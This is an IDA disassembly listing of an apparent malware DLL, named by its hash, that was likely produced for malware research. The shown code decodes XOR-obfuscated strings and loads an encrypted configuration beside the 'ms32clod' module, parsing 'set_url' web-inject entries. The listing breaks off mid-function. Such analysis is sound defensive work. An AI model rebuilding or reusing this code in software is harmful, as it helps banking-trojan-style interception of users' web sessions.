;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4FAAB4A9F58D3FBFF9BAA89E9211C0A5
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; [00001000 BYTES: COLLAPSED SEGMENT HEADER. PRESS KEYPAD "+" TO EXPAND]
; File Name : u:\work\4faab4a9f58d3fbff9baa89e9211c0a5_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 0001C2F1 ( 115441.)
; Section size in file : 0001C400 ( 115712.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 10001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001000 proc near ; DATA XREF: .data:10022004�o
push ebp
mov ebp, esp
call sub_1000100F
call sub_10001028
pop ebp
retn
sub_10001000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000100F proc near ; CODE XREF: sub_10001000+3�p
push ebp
mov ebp, esp
mov ecx, offset dword_10034238
call ??0_Iterator_base@std@@QAE@XZ ; std::_Iterator_base::_Iterator_base(void)
mov ecx, offset dword_1002C200
call ??0_Iterator_base@std@@QAE@XZ ; std::_Iterator_base::_Iterator_base(void)
pop ebp
retn
sub_1000100F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001028 proc near ; CODE XREF: sub_10001000+8�p
push ebp
mov ebp, esp
push offset sub_1000103A ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10001028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000103A()
sub_1000103A proc near ; DATA XREF: sub_10001028+3�o
push ebp
mov ebp, esp
mov ecx, offset dword_1002C200
call sub_10018E14
mov ecx, offset dword_10034238
call sub_10018E14
pop ebp
retn
sub_1000103A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001053 proc near ; DATA XREF: .data:10022008�o
push ebp
mov ebp, esp
call sub_1000105D
pop ebp
retn
sub_10001053 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000105D proc near ; CODE XREF: sub_10001053+3�p
push ebp
mov ebp, esp
push 0C8h
push 0C8h
push 0
push 0
mov ecx, offset dword_10030218
call sub_1000CF50
pop ebp
retn
sub_1000105D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000107A proc near ; DATA XREF: .data:1002200C�o
push ebp
mov ebp, esp
call sub_10001089
call sub_1000109A
pop ebp
retn
sub_1000107A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001089 proc near ; CODE XREF: sub_1000107A+3�p
push ebp
mov ebp, esp
push 0
mov ecx, offset dword_100281E0
call sub_1000E100
pop ebp
retn
sub_10001089 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000109A proc near ; CODE XREF: sub_1000107A+8�p
push ebp
mov ebp, esp
push offset sub_100010AC ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000109A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_100010AC()
sub_100010AC proc near ; DATA XREF: sub_1000109A+3�o
push ebp
mov ebp, esp
mov ecx, offset dword_100281E0
call sub_1000E1D0
pop ebp
retn
sub_100010AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100010BB(char *Str, int, void *Dest)
sub_100010BB proc near ; CODE XREF: sub_100020B5+383�p
; sub_1000291D+A2�p ...
var_14 = dword ptr -14h
Source = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
Dest = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push 400h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dest], eax
push 400h ; Size
push 0 ; Val
mov eax, [ebp+Dest]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+Str]
push ecx ; Str
call strlen ; strlen
add esp, 4
mov [ebp+var_4], eax
mov edx, [ebp+arg_4]
push edx ; Str
call strlen ; strlen
add esp, 4
mov [ebp+var_8], eax
mov [ebp+var_C], 0
jmp short loc_10001115
; ---------------------------------------------------------------------------
loc_1000110C: ; CODE XREF: sub_100010BB+AA�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_10001115: ; CODE XREF: sub_100010BB+4F�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_4]
jge short loc_10001167
mov edx, [ebp+Str]
add edx, [ebp+var_C]
mov al, [edx]
mov [ebp+Source], al
mov ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_14], ecx
jmp short loc_1000113C
; ---------------------------------------------------------------------------
loc_10001133: ; CODE XREF: sub_100010BB+95�j
mov edx, [ebp+var_14]
sub edx, 1
mov [ebp+var_14], edx
loc_1000113C: ; CODE XREF: sub_100010BB+76�j
cmp [ebp+var_14], 0
jl short loc_10001152
mov eax, [ebp+arg_4]
add eax, [ebp+var_14]
mov cl, [ebp+Source]
xor cl, [eax]
mov [ebp+Source], cl
jmp short loc_10001133
; ---------------------------------------------------------------------------
loc_10001152: ; CODE XREF: sub_100010BB+85�j
push 1 ; Count
lea edx, [ebp+Source]
push edx ; Source
mov eax, [ebp+Dest]
push eax ; Dest
call ds:strncat ; strncat
add esp, 0Ch
jmp short loc_1000110C
; ---------------------------------------------------------------------------
loc_10001167: ; CODE XREF: sub_100010BB+60�j
mov eax, [ebp+Dest]
mov esp, ebp
pop ebp
retn
sub_100010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000116E proc near ; CODE XREF: TimerFunc+3A4�p
; sub_1000E66B+198�p
var_8 = dword ptr -8
Str = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+Str], offset a? ; "\\/:*\"<>|?"
mov [ebp+var_8], 0
jmp short loc_1000118D
; ---------------------------------------------------------------------------
loc_10001184: ; CODE XREF: sub_1000116E:loc_100011D3�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_1000118D: ; CODE XREF: sub_1000116E+14�j
mov ecx, [ebp+Str]
push ecx ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_8], eax
jnb short loc_100011D5
mov edx, [ebp+Str]
add edx, [ebp+var_8]
movsx eax, byte ptr [edx]
push eax ; Val
mov ecx, [ebp+arg_0]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_100011D3
mov edx, [ebp+Str]
add edx, [ebp+var_8]
movsx eax, byte ptr [edx]
push eax ; Val
mov ecx, [ebp+arg_0]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 5Fh
loc_100011D3: ; CODE XREF: sub_1000116E+49�j
jmp short loc_10001184
; ---------------------------------------------------------------------------
loc_100011D5: ; CODE XREF: sub_1000116E+2E�j
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_1000116E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100011DC(char *Source, int, char *Str)
sub_100011DC proc near ; CODE XREF: sub_100015CE+202�p
; sub_10003786+138�p ...
var_10 = dword ptr -10h
Count = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
Str = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], 0
mov [ebp+var_4], 0
mov eax, [ebp+Source]
mov [ebp+var_10], eax
mov ecx, [ebp+Source]
push ecx ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jbe loc_100012CA
loc_1000120A: ; CODE XREF: sub_100011DC+DE�j
cmp [ebp+var_4], 0
jnz loc_100012BF
mov edx, [ebp+Str]
push edx ; SubStr
mov eax, [ebp+Source]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
sub eax, [ebp+Source]
mov [ebp+Count], eax
cmp [ebp+Count], 0
jge short loc_10001249
mov ecx, [ebp+Source]
push ecx ; Str
call strlen ; strlen
add esp, 4
mov [ebp+Count], eax
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_10001249: ; CODE XREF: sub_100011DC+53�j
mov eax, [ebp+Count]
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx+ecx*4], eax
mov eax, [ebp+Count]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov eax, [edx+ecx*4]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+Count]
push ecx ; Count
mov edx, [ebp+Source]
push edx ; Source
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
mov edx, [ecx+eax*4]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
mov ecx, [ebp+Count]
add ecx, eax
mov edx, [ebp+Source]
add edx, ecx
mov [ebp+Source], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
jmp loc_1000120A
; ---------------------------------------------------------------------------
loc_100012BF: ; CODE XREF: sub_100011DC+32�j
mov ecx, [ebp+var_10]
mov [ebp+Source], ecx
mov eax, [ebp+var_8]
jmp short loc_100012CD
; ---------------------------------------------------------------------------
loc_100012CA: ; CODE XREF: sub_100011DC+28�j
or eax, 0FFFFFFFFh
loc_100012CD: ; CODE XREF: sub_100011DC+EC�j
mov esp, ebp
pop ebp
retn
sub_100011DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100012D1(char *lpString2, char *SubStr, int, LPSTR Dest, int)
sub_100012D1 proc near ; CODE XREF: sub_1000A318+C00�p
; sub_10012894+179�p ...
Source = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
lpString2 = dword ptr 8
SubStr = dword ptr 0Ch
arg_8 = dword ptr 10h
Dest = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_18], 0
mov eax, [ebp+lpString2]
push eax ; Str
call strlen ; strlen
add esp, 4
mov [ebp+var_C], eax
mov ecx, [ebp+SubStr]
push ecx ; Str
call strlen ; strlen
add esp, 4
mov [ebp+var_14], eax
mov edx, [ebp+arg_8]
push edx ; Str
call strlen ; strlen
add esp, 4
mov [ebp+var_10], eax
mov eax, [ebp+lpString2]
mov [ebp+Source], eax
loc_10001311: ; CODE XREF: sub_100012D1+6C�j
mov ecx, [ebp+SubStr]
push ecx ; SubStr
mov edx, [ebp+Source]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
mov [ebp+Source], eax
cmp [ebp+Source], 0
jz short loc_1000133F
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
mov ecx, [ebp+Source]
add ecx, 1
mov [ebp+Source], ecx
jmp short loc_10001311
; ---------------------------------------------------------------------------
loc_1000133F: ; CODE XREF: sub_100012D1+58�j
cmp [ebp+var_18], 0
jnz short loc_1000135B
mov edx, [ebp+lpString2]
push edx ; lpString2
mov eax, [ebp+Dest]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov eax, [ebp+var_18]
jmp loc_100013FA
; ---------------------------------------------------------------------------
loc_1000135B: ; CODE XREF: sub_100012D1+72�j
mov ecx, [ebp+var_14]
imul ecx, [ebp+var_18]
mov edx, [ebp+var_C]
sub edx, ecx
mov eax, [ebp+var_10]
imul eax, [ebp+var_18]
add edx, eax
mov [ebp+var_4], edx
mov ecx, [ebp+lpString2]
mov [ebp+Source], ecx
mov [ebp+var_18], 0
loc_10001380: ; CODE XREF: sub_100012D1+114�j
mov edx, [ebp+SubStr]
push edx ; SubStr
mov eax, [ebp+Source]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_100013A2
mov ecx, [ebp+arg_10]
cmp ecx, [ebp+var_18]
jnz short loc_100013A4
loc_100013A2: ; CODE XREF: sub_100012D1+C7�j
jmp short loc_100013E7
; ---------------------------------------------------------------------------
loc_100013A4: ; CODE XREF: sub_100012D1+CF�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
mov eax, [ebp+var_8]
sub eax, [ebp+Source]
push eax ; Count
mov ecx, [ebp+Source]
push ecx ; Source
mov edx, [ebp+Dest]
push edx ; Dest
call ds:strncat ; strncat
add esp, 0Ch
mov eax, [ebp+arg_8]
push eax ; Source
mov ecx, [ebp+Dest]
push ecx ; Dest
call strcat ; strcat
add esp, 8
mov edx, [ebp+var_8]
add edx, [ebp+var_14]
mov [ebp+Source], edx
mov eax, 1
test eax, eax
jnz short loc_10001380
loc_100013E7: ; CODE XREF: sub_100012D1:loc_100013A2�j
mov ecx, [ebp+Source]
push ecx ; Source
mov edx, [ebp+Dest]
push edx ; Dest
call strcat ; strcat
add esp, 8
mov eax, [ebp+var_18]
loc_100013FA: ; CODE XREF: sub_100012D1+85�j
mov esp, ebp
pop ebp
retn
sub_100012D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100013FE proc near ; CODE XREF: sub_100020B5+206�p
; sub_100020B5+5D1�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_10001414
; ---------------------------------------------------------------------------
loc_1000140B: ; CODE XREF: sub_100013FE:loc_10001434�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_10001414: ; CODE XREF: sub_100013FE+B�j
mov ecx, [ebp+arg_4]
sub ecx, 1
cmp [ebp+var_4], ecx
jnb short loc_10001436
mov edx, [ebp+arg_0]
add edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
test eax, eax
jnz short loc_10001434
mov eax, 1
jmp short loc_10001438
; ---------------------------------------------------------------------------
loc_10001434: ; CODE XREF: sub_100013FE+2D�j
jmp short loc_1000140B
; ---------------------------------------------------------------------------
loc_10001436: ; CODE XREF: sub_100013FE+1F�j
xor eax, eax
loc_10001438: ; CODE XREF: sub_100013FE+34�j
mov esp, ebp
pop ebp
retn
sub_100013FE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 40Ch
push edi
mov dword ptr [ebp-404h], 0
mov dword ptr [ebp-408h], 0
mov byte ptr [ebp-400h], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-3FFh]
rep stosd
stosw
stosb
loc_10001473: ; CODE XREF: .text:100015C1�j
mov eax, [ebp+8]
push eax
call ds:lstrlenA ; lstrlenA
cmp [ebp-404h], eax
jge loc_100015C6
cmp dword ptr [ebp-408h], 0
jnz loc_1000152B
mov ecx, [ebp+8]
add ecx, [ebp-404h]
mov dl, [ecx]
mov [ebp-40Ch], dl
cmp byte ptr [ebp-40Ch], 0Ah
jz short loc_100014C4
cmp byte ptr [ebp-40Ch], 0Dh
jz short loc_100014C4
cmp byte ptr [ebp-40Ch], 20h
jz short loc_100014C6
jmp short loc_1000150F
; ---------------------------------------------------------------------------
loc_100014C4: ; CODE XREF: .text:100014AE�j
; .text:100014B7�j
jmp short loc_1000152B
; ---------------------------------------------------------------------------
loc_100014C6: ; CODE XREF: .text:100014C0�j
lea eax, [ebp-400h]
push eax
call ds:lstrlenA ; lstrlenA
movsx ecx, byte ptr [ebp+eax-400h]
cmp ecx, 20h
jz short loc_1000150D
lea edx, [ebp-400h]
push edx
call ds:lstrlenA ; lstrlenA
test eax, eax
jle short loc_1000150D
push 1
mov eax, [ebp+8]
add eax, [ebp-404h]
push eax
lea ecx, [ebp-400h]
push ecx
call ds:strncat ; strncat
add esp, 0Ch
loc_1000150D: ; CODE XREF: .text:100014DE�j
; .text:100014EF�j
jmp short loc_1000152B
; ---------------------------------------------------------------------------
loc_1000150F: ; CODE XREF: .text:100014C2�j
push 1
mov edx, [ebp+8]
add edx, [ebp-404h]
push edx
lea eax, [ebp-400h]
push eax
call ds:strncat ; strncat
add esp, 0Ch
loc_1000152B: ; CODE XREF: .text:10001490�j
; .text:loc_100014C4�j ...
mov ecx, [ebp+8]
add ecx, [ebp-404h]
movsx edx, byte ptr [ecx]
cmp edx, 3Ch
jnz short loc_10001597
lea eax, [ebp-400h]
push eax
call ds:lstrlenA ; lstrlenA
mov byte ptr [ebp+eax-401h], 0
lea ecx, [ebp-400h]
push ecx
call ds:lstrlenA ; lstrlenA
test eax, eax
jle short loc_1000158D
lea edx, [ebp-400h]
push edx
mov eax, [ebp+0Ch]
push eax
call strcat ; strcat
add esp, 8
push offset asc_10022608 ; "\r\n"
mov ecx, [ebp+0Ch]
push ecx
call strcat ; strcat
add esp, 8
mov byte ptr [ebp-400h], 0
loc_1000158D: ; CODE XREF: .text:10001560�j
mov dword ptr [ebp-408h], 1
loc_10001597: ; CODE XREF: .text:1000153A�j
mov edx, [ebp+8]
add edx, [ebp-404h]
movsx eax, byte ptr [edx]
cmp eax, 3Eh
jnz short loc_100015B2
mov dword ptr [ebp-408h], 0
loc_100015B2: ; CODE XREF: .text:100015A6�j
mov ecx, [ebp-404h]
add ecx, 1
mov [ebp-404h], ecx
jmp loc_10001473
; ---------------------------------------------------------------------------
loc_100015C6: ; CODE XREF: .text:10001483�j
mov eax, [ebp+0Ch]
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100015CE(LPCSTR lpString2)
sub_100015CE proc near ; CODE XREF: sub_1000B7EF+126�p
var_78C = dword ptr -78Ch
var_788 = dword ptr -788h
var_784 = dword ptr -784h
var_780 = dword ptr -780h
var_77C = dword ptr -77Ch
var_778 = dword ptr -778h
FileName = byte ptr -774h
var_674 = dword ptr -674h
var_670 = byte ptr -670h
var_66C = dword ptr -66Ch
var_668 = dword ptr -668h
var_664 = dword ptr -664h
Buffer = byte ptr -660h
hObject = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
Memory = dword ptr -64Ch
NumberOfBytesRead= dword ptr -0Ch
var_8 = dword ptr -8
Str = dword ptr -4
lpString2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 78Ch
mov [ebp+var_66C], 0
mov [ebp+var_674], 0
mov [ebp+var_77C], 0
mov [ebp+var_654], 0FFFFFFFFh
mov [ebp+var_778], 0
mov [ebp+var_668], 0
mov [ebp+var_650], 0
mov [ebp+var_664], 0
mov [ebp+var_8], 0
push 0FFh ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
push offset ModuleName ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push 5Ch ; Ch
lea ecx, [ebp+FileName]
push ecx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax+1], 0
mov edx, [ebp+lpString2]
push edx ; lpString2
lea eax, [ebp+FileName]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz loc_100017B9
push 0 ; lpFileSizeHigh
mov edx, [ebp+hObject]
push edx ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+var_780], eax
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 5 ; nNumberOfBytesToRead
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:ReadFile ; ReadFile
mov eax, [ebp+var_780]
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Str], eax
mov ecx, [ebp+var_780]
add ecx, 1
push ecx ; Size
push 0 ; Val
mov edx, [ebp+Str]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+NumberOfBytesRead], 1
loc_10001708: ; CODE XREF: sub_100015CE:loc_100017A5�j
cmp [ebp+NumberOfBytesRead], 0
jz loc_100017AA
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 1 ; nNumberOfBytesToRead
lea ecx, [ebp+var_670]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:ReadFile ; ReadFile
mov [ebp+var_784], 0
jmp short loc_10001749
; ---------------------------------------------------------------------------
loc_1000173A: ; CODE XREF: sub_100015CE+19D�j
mov eax, [ebp+var_784]
add eax, 1
mov [ebp+var_784], eax
loc_10001749: ; CODE XREF: sub_100015CE+16A�j
cmp [ebp+var_784], 5
jge short loc_1000176D
mov ecx, [ebp+var_784]
mov dl, [ebp+var_670]
xor dl, [ebp+ecx+Buffer]
mov [ebp+var_670], dl
jmp short loc_1000173A
; ---------------------------------------------------------------------------
loc_1000176D: ; CODE XREF: sub_100015CE+182�j
movsx eax, [ebp+var_670]
cmp eax, 0Ah
jz short loc_100017A5
movsx ecx, [ebp+var_670]
cmp ecx, 0Dh
jz short loc_100017A5
mov edx, [ebp+Str]
add edx, [ebp+var_66C]
mov al, [ebp+var_670]
mov [edx], al
mov ecx, [ebp+var_66C]
add ecx, 1
mov [ebp+var_66C], ecx
loc_100017A5: ; CODE XREF: sub_100015CE+1A9�j
; sub_100015CE+1B5�j
jmp loc_10001708
; ---------------------------------------------------------------------------
loc_100017AA: ; CODE XREF: sub_100015CE+13E�j
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_100017C0
; ---------------------------------------------------------------------------
loc_100017B9: ; CODE XREF: sub_100015CE+CE�j
xor eax, eax
jmp loc_10001D1C
; ---------------------------------------------------------------------------
loc_100017C0: ; CODE XREF: sub_100015CE+1E9�j
push offset aSet_url ; "set_url "
lea eax, [ebp+Memory]
push eax ; int
mov ecx, [ebp+Str]
push ecx ; Source
call sub_100011DC
add esp, 0Ch
mov [ebp+var_668], eax
mov edx, [ebp+Str]
push edx ; Memory
call ds:free ; free
add esp, 4
mov [ebp+var_654], 0
mov [ebp+var_66C], 1
jmp short loc_10001810
; ---------------------------------------------------------------------------
loc_10001801: ; CODE XREF: sub_100015CE+744�j
mov eax, [ebp+var_66C]
add eax, 1
mov [ebp+var_66C], eax
loc_10001810: ; CODE XREF: sub_100015CE+231�j
mov ecx, [ebp+var_66C]
cmp ecx, [ebp+var_668]
jge loc_10001D17
mov [ebp+var_664], 0
mov [ebp+var_674], 0
mov [ebp+var_77C], 0
mov edx, [ebp+var_66C]
mov eax, [ebp+edx*4+Memory]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov [ebp+var_778], eax
mov ecx, [ebp+var_778]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Str], eax
mov edx, [ebp+var_778]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+Str]
push eax ; Dst
call memset ; memset
add esp, 0Ch
loc_10001888: ; CODE XREF: sub_100015CE+70C�j
mov ecx, [ebp+var_66C]
mov edx, [ebp+ecx*4+Memory]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
cmp [ebp+var_77C], eax
jle short loc_100018A9
jmp loc_10001CDF
; ---------------------------------------------------------------------------
loc_100018A9: ; CODE XREF: sub_100015CE+2D4�j
mov eax, [ebp+var_66C]
mov ecx, [ebp+eax*4+Memory]
mov edx, [ebp+Str]
add edx, [ebp+var_674]
mov eax, [ebp+var_77C]
mov cl, [ecx+eax]
mov [edx], cl
mov [ebp+var_788], 0
jmp short loc_100018E5
; ---------------------------------------------------------------------------
loc_100018D6: ; CODE XREF: sub_100015CE:loc_10001CB7�j
mov edx, [ebp+var_788]
add edx, 1
mov [ebp+var_788], edx
loc_100018E5: ; CODE XREF: sub_100015CE+306�j
cmp [ebp+var_788], 4
jge loc_10001CBC
mov eax, [ebp+var_788]
mov ecx, SubStr[eax*4]
push ecx ; SubStr
mov edx, [ebp+Str]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_10001CB7
mov eax, [ebp+var_788]
mov [ebp+var_78C], eax
cmp [ebp+var_78C], 3
ja loc_10001CAD
mov ecx, [ebp+var_78C]
jmp ds:off_10001D20[ecx*4]
loc_1000193B: ; DATA XREF: .text:off_10001D20�o
mov edx, [ebp+var_788]
mov eax, SubStr[edx*4]
push eax ; SubStr
mov ecx, [ebp+Str]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
mov byte ptr [eax], 0
cmp [ebp+var_664], 0
jnz loc_10001A27
mov edx, [ebp+Str]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_654]
mov lpString1[ecx*4], eax
mov edx, [ebp+Str]
push edx ; lpString2
mov eax, [ebp+var_654]
mov ecx, lpString1[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 20h ; Val
mov edx, [ebp+var_654]
mov eax, lpString1[edx*4]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_10001A27
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_654]
mov dword_10035724[ecx*4], eax
push 20h ; Val
mov edx, [ebp+var_654]
mov eax, lpString1[edx*4]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
add eax, 1
push eax ; lpString2
mov ecx, [ebp+var_654]
mov edx, dword_10035724[ecx*4]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 20h ; Val
mov eax, [ebp+var_654]
mov ecx, lpString1[eax*4]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
loc_10001A27: ; CODE XREF: sub_100015CE+392�j
; sub_100015CE+3EF�j
mov [ebp+var_674], 0FFFFFFFFh
mov edx, [ebp+var_778]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+Str]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_650], 1
jmp loc_10001CAD
; ---------------------------------------------------------------------------
loc_10001A58: ; CODE XREF: sub_100015CE+366�j
; DATA XREF: .text:10001D24�o
mov [ebp+var_674], 0FFFFFFFFh
mov ecx, [ebp+var_778]
add ecx, 1
push ecx ; Size
push 0 ; Val
mov edx, [ebp+Str]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_650], 2
jmp loc_10001CAD
; ---------------------------------------------------------------------------
loc_10001A89: ; CODE XREF: sub_100015CE+366�j
; DATA XREF: .text:10001D28�o
mov [ebp+var_674], 0FFFFFFFFh
mov eax, [ebp+var_778]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+Str]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_650], 3
jmp loc_10001CAD
; ---------------------------------------------------------------------------
loc_10001ABA: ; CODE XREF: sub_100015CE+366�j
; DATA XREF: .text:10001D2C�o
mov edx, [ebp+var_788]
mov eax, SubStr[edx*4]
push eax ; SubStr
mov ecx, [ebp+Str]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
mov byte ptr [eax], 0
cmp [ebp+var_650], 1
jnz loc_10001BF7
cmp [ebp+var_664], 0
jz loc_10001BB1
mov edx, [ebp+var_654]
add edx, 1
mov [ebp+var_654], edx
mov eax, [ebp+var_654]
mov ecx, lpString[eax*4]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, [ebp+var_654]
mov lpString1[edx*4], eax
mov eax, [ebp+var_654]
mov ecx, lpString[eax*4]
push ecx ; lpString2
mov edx, [ebp+var_654]
mov eax, lpString1[edx*4]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov ecx, [ebp+var_654]
cmp dword_10035720[ecx*4], 0
jz short loc_10001BB1
mov edx, [ebp+var_654]
mov eax, dword_10035720[edx*4]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 1
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_654]
mov dword_10035724[ecx*4], eax
mov edx, [ebp+var_654]
mov eax, dword_10035720[edx*4]
push eax ; lpString2
mov ecx, [ebp+var_654]
mov edx, dword_10035724[ecx*4]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10001BB1: ; CODE XREF: sub_100015CE+51E�j
; sub_100015CE+591�j
